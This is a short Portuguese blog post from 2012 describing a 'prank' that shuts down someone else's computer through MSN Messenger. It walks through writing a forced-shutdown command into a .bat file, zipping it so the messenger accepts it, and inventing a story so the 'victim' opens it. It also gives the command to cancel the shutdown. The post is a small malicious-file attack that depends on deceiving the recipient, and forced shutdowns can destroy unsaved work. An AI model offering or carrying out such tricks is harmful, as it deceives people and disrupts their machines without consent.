domingo, 6 de maio de 2012

Como desligar o PC de outra pessoa pelo MSN

Dae povo, eu tava vendo algumas coisas na internet quando me deparei com alguns tutoriais mostrando como desligar o computador da pessoa pelo MSN. Já que eu fiquei animado com a ideia eu resolvi postar o tutorial dessa "brincadeira" aqui no blog:

1º Passo - Abra o Bloco de notas.

2º Passo - Escreva com letras minusculas "shutdown -s -f -t 0" (sem aspas) o número "0" representa os segundos que o PC da outra pessoa vai demora pra desligar, você pode botar qualquer outro número para diminuir o tempo ou aumentar pra desligar.


3º Passo - Feito isso, clique em Arquivo e em Salvar Como, salve com qualquer nome, mas o final tem que ser ".Bat" Ex: "qualquernome.Bat"


4º Passo - Compacte o arquivo usando o WinRar, caso contrario o arquivo não vai passar pelo MSN.



5º Passo - Envie o arquivo para o MSN e invente qualquer história para que a vítima aceite o arquivo e abra ele.


Extra: para cancelar o encerramento, basta ir no Menu Executar e digitar "shutdown -a" (sem aspas)

Nenhum comentário:

Postar um comentário